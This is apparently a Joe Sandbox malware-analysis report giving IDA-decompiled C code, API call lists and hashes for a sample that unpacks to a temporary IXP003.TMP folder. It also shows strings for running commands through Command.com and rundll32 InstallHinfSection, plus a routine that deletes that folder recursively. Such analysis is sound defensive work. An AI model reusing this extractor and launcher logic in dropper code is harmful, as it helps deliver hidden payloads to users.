                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-506080820
                                                                                                                                                                                                      • Opcode ID: 88683c0d92f60d10608277aa14c45cfb612ac87e288dcf57003169dd9f6e03fb
                                                                                                                                                                                                      • Instruction ID: 950c338784e272525515edf3412edf8d19f8363e87bc231c74a971566a2c2eb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88683c0d92f60d10608277aa14c45cfb612ac87e288dcf57003169dd9f6e03fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88A14CB0A002186BEB20DB24CC45FEA7FB9EB52310F1C4799E555E32D1DBB19D86CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 406 a62f1d-a62f3d 407 a62f3f-a62f46 406->407 408 a62f6c-a62f73 call a65164 406->408 410 a62f5f-a62f66 call a63a3f 407->410 411 a62f48 call a651e5 407->411 415 a63041 408->415 416 a62f79-a62f80 call a655a0 408->416 410->408 410->415 417 a62f4d-a62f4f 411->417 420 a63043-a63053 call a66ce0 415->420 416->415 424 a62f86-a62fbe GetSystemDirectoryA call a6658a LoadLibraryA 416->424 417->415 421 a62f55-a62f5d 417->421 421->408 421->410 428 a62ff7-a63004 FreeLibrary 424->428 429 a62fc0-a62fd4 GetProcAddress 424->429 431 a63006-a6300c 428->431 432 a63017-a63024 SetCurrentDirectoryA 428->432 429->428 430 a62fd6-a62fee DecryptFileA 429->430 430->428 445 a62ff0-a62ff5 430->445 431->432 433 a6300e call a6621e 431->433 434 a63026-a6303c call a644b9 call a66285 432->434 435 a63054-a6305a 432->435 441 a63013-a63015 433->441 434->415 439 a63065-a6306c 435->439 440 a6305c call a63b26 435->440 442 a6306e-a63075 call a6256d 439->442 443 a6307c-a63089 439->443 447 a63061-a63063 440->447 441->415 441->432 452 a6307a 442->452 449 a630a1-a630a9 443->449 450 a6308b-a63091 443->450 445->428 447->415 447->439 455 a630b4-a630b7 449->455 456 a630ab-a630ad 449->456 450->449 453 a63093 call a63ba2 450->453 452->443 459 a63098-a6309a 453->459 455->420 456->455 458 a630af call a64169 456->458 458->455 459->415 461 a6309c 459->461 461->449
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00A62F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0xa68a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E00A65164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E00A66CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E00A655A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E00A6658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0xa6a288("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0xa68a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0xa68a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0xa68d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0xa68d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0xa69a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E00A6256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0xa68a24; // 0x0
                                                                                                                                                                                                      									 *0xa69a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0xa68a38;
                                                                                                                                                                                                      										if( *0xa68a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E00A64169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0xa69a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E00A63BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0xa68a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E00A63B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                      							E00A644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0xa69124 = E00A66285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0xa69a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00A6621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0xa68a24;
                                                                                                                                                                                                      				if( *0xa68a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E00A63A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00A651E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0xa68a38;
                                                                                                                                                                                                      				if( *0xa68a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x00a62f1d
                                                                                                                                                                                                      0x00a62f28
                                                                                                                                                                                                      0x00a62f2f
                                                                                                                                                                                                      0x00a62f3d
                                                                                                                                                                                                      0x00a62f6c
                                                                                                                                                                                                      0x00a62f6c
                                                                                                                                                                                                      0x00a62f71
                                                                                                                                                                                                      0x00a62f73
                                                                                                                                                                                                      0x00a63041
                                                                                                                                                                                                      0x00a63041
                                                                                                                                                                                                      0x00a63043
                                                                                                                                                                                                      0x00a63053
                                                                                                                                                                                                      0x00a63053
                                                                                                                                                                                                      0x00a62f79
                                                                                                                                                                                                      0x00a62f80
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62f86
                                                                                                                                                                                                      0x00a62f86
                                                                                                                                                                                                      0x00a62f93
                                                                                                                                                                                                      0x00a62f9e
                                                                                                                                                                                                      0x00a62fa0
                                                                                                                                                                                                      0x00a62fa6
                                                                                                                                                                                                      0x00a62fb8
                                                                                                                                                                                                      0x00a62fba
                                                                                                                                                                                                      0x00a62fbe
                                                                                                                                                                                                      0x00a62fc6
                                                                                                                                                                                                      0x00a62fcc
                                                                                                                                                                                                      0x00a62fd4
                                                                                                                                                                                                      0x00a62fd6
                                                                                                                                                                                                      0x00a62fd8
                                                                                                                                                                                                      0x00a62fe0
                                                                                                                                                                                                      0x00a62fe6
                                                                                                                                                                                                      0x00a62fee
                                                                                                                                                                                                      0x00a62ff0
                                                                                                                                                                                                      0x00a62ff5
                                                                                                                                                                                                      0x00a62ff5
                                                                                                                                                                                                      0x00a62fee
                                                                                                                                                                                                      0x00a62fd4
                                                                                                                                                                                                      0x00a62ff8
                                                                                                                                                                                                      0x00a62ffe
                                                                                                                                                                                                      0x00a63004
                                                                                                                                                                                                      0x00a63017
                                                                                                                                                                                                      0x00a6301c
                                                                                                                                                                                                      0x00a63024
                                                                                                                                                                                                      0x00a63054
                                                                                                                                                                                                      0x00a6305a
                                                                                                                                                                                                      0x00a63065
                                                                                                                                                                                                      0x00a63065
                                                                                                                                                                                                      0x00a6306c
                                                                                                                                                                                                      0x00a6306e
                                                                                                                                                                                                      0x00a63075
                                                                                                                                                                                                      0x00a6307a
                                                                                                                                                                                                      0x00a6307a
                                                                                                                                                                                                      0x00a6307c
                                                                                                                                                                                                      0x00a63081
                                                                                                                                                                                                      0x00a63087
                                                                                                                                                                                                      0x00a63089
                                                                                                                                                                                                      0x00a630a1
                                                                                                                                                                                                      0x00a630a1
                                                                                                                                                                                                      0x00a630a9
                                                                                                                                                                                                      0x00a630ab
                                                                                                                                                                                                      0x00a630ad
                                                                                                                                                                                                      0x00a630af
                                                                                                                                                                                                      0x00a630af
                                                                                                                                                                                                      0x00a630ad
                                                                                                                                                                                                      0x00a630b6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6308b
                                                                                                                                                                                                      0x00a6308b
                                                                                                                                                                                                      0x00a63091
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63093
                                                                                                                                                                                                      0x00a63098
                                                                                                                                                                                                      0x00a6309a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6309c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6309c
                                                                                                                                                                                                      0x00a63089
                                                                                                                                                                                                      0x00a6305c
                                                                                                                                                                                                      0x00a63061
                                                                                                                                                                                                      0x00a63063
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63063
                                                                                                                                                                                                      0x00a6302b
                                                                                                                                                                                                      0x00a63032
                                                                                                                                                                                                      0x00a6303c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6303c
                                                                                                                                                                                                      0x00a63006
                                                                                                                                                                                                      0x00a6300c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6300e
                                                                                                                                                                                                      0x00a63015
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63015
                                                                                                                                                                                                      0x00a62f80
                                                                                                                                                                                                      0x00a62f3f
                                                                                                                                                                                                      0x00a62f46
                                                                                                                                                                                                      0x00a62f5f
                                                                                                                                                                                                      0x00a62f5f
                                                                                                                                                                                                      0x00a62f64
                                                                                                                                                                                                      0x00a62f66
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62f66
                                                                                                                                                                                                      0x00a62f4f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62f55
                                                                                                                                                                                                      0x00a62f5d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A62F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A62FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A62FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 00A62FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A62FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6301C
                                                                                                                                                                                                        • Part of subcall function 00A651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A62F4D,?,00000002,00000000), ref: 00A65201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-1932822326
                                                                                                                                                                                                      • Opcode ID: 81df6a23e1999531234ed9fab3fba1b3e8c3ac2a48d7cd915ad735a1262608f6
                                                                                                                                                                                                      • Instruction ID: 41a397875d99030d4c75eda82c9faaf343c84cd2f314206e077a2e84ce5e0407
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81df6a23e1999531234ed9fab3fba1b3e8c3ac2a48d7cd915ad735a1262608f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A841B632A00605AADF30EBF19D4576633BCDB64790F160265E941D21D2EFB4CE87CA61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00A62390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E00A66CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A61680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E00A616B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E00A61680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E00A616B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                      								E00A616B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E00A6658A( &_v280, 0x104, 0xa61140);
                                                                                                                                                                                                      								E00A62390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      0x00a62398
                                                                                                                                                                                                      0x00a6239e
                                                                                                                                                                                                      0x00a623a3
                                                                                                                                                                                                      0x00a623a5
                                                                                                                                                                                                      0x00a623ae
                                                                                                                                                                                                      0x00a623b3
                                                                                                                                                                                                      0x00a624cb
                                                                                                                                                                                                      0x00a624d2
                                                                                                                                                                                                      0x00a624d3
                                                                                                                                                                                                      0x00a624d4
                                                                                                                                                                                                      0x00a624df
                                                                                                                                                                                                      0x00a623c2
                                                                                                                                                                                                      0x00a623d1
                                                                                                                                                                                                      0x00a623db
                                                                                                                                                                                                      0x00a623e4
                                                                                                                                                                                                      0x00a623f6
                                                                                                                                                                                                      0x00a623fc
                                                                                                                                                                                                      0x00a62401
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62407
                                                                                                                                                                                                      0x00a62407
                                                                                                                                                                                                      0x00a62408
                                                                                                                                                                                                      0x00a62411
                                                                                                                                                                                                      0x00a6241f
                                                                                                                                                                                                      0x00a6247a
                                                                                                                                                                                                      0x00a62483
                                                                                                                                                                                                      0x00a62495
                                                                                                                                                                                                      0x00a624a3
                                                                                                                                                                                                      0x00a62421
                                                                                                                                                                                                      0x00a6242f
                                                                                                                                                                                                      0x00a62453
                                                                                                                                                                                                      0x00a6245d
                                                                                                                                                                                                      0x00a62466
                                                                                                                                                                                                      0x00a62472
                                                                                                                                                                                                      0x00a62472
                                                                                                                                                                                                      0x00a6242f
                                                                                                                                                                                                      0x00a624af
                                                                                                                                                                                                      0x00a624b5
                                                                                                                                                                                                      0x00a624be
                                                                                                                                                                                                      0x00a624c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a624c5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,00A68A3A,00A611F4,00A68A3A,00000000,?,?), ref: 00A623F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00A611F8), ref: 00A62427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00A611FC), ref: 00A6243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A62495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00A624A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A624AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00A624BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(00A68A3A), ref: 00A624C5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: 10cb9dfa1cd0a4eca3f681793a2c0cee47c6eaaceae01766d667c217d4d5d70c
                                                                                                                                                                                                      • Instruction ID: b909b807b5a3974c3f0821c5dcd6e9583e1aa180cf6ff8b9bec59a02a4c85204
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10cb9dfa1cd0a4eca3f681793a2c0cee47c6eaaceae01766d667c217d4d5d70c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A31A131604A40ABC320EBA4CD8DBEB77FCABD5305F084A2DF55586290EF74990DCB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E00A62BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0xa6a288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0xa69124 = 0;
                                                                                                                                                                                                      				if(E00A62CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E00A62F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E00A652B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0xa68a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0xa69a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E00A61F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0xa68588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0xa69124; // 0x0
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00a62c03
                                                                                                                                                                                                      0x00a62c0d
                                                                                                                                                                                                      0x00a62c18
                                                                                                                                                                                                      0x00a62c20
                                                                                                                                                                                                      0x00a62c2e
                                                                                                                                                                                                      0x00a62c32
                                                                                                                                                                                                      0x00a62c36
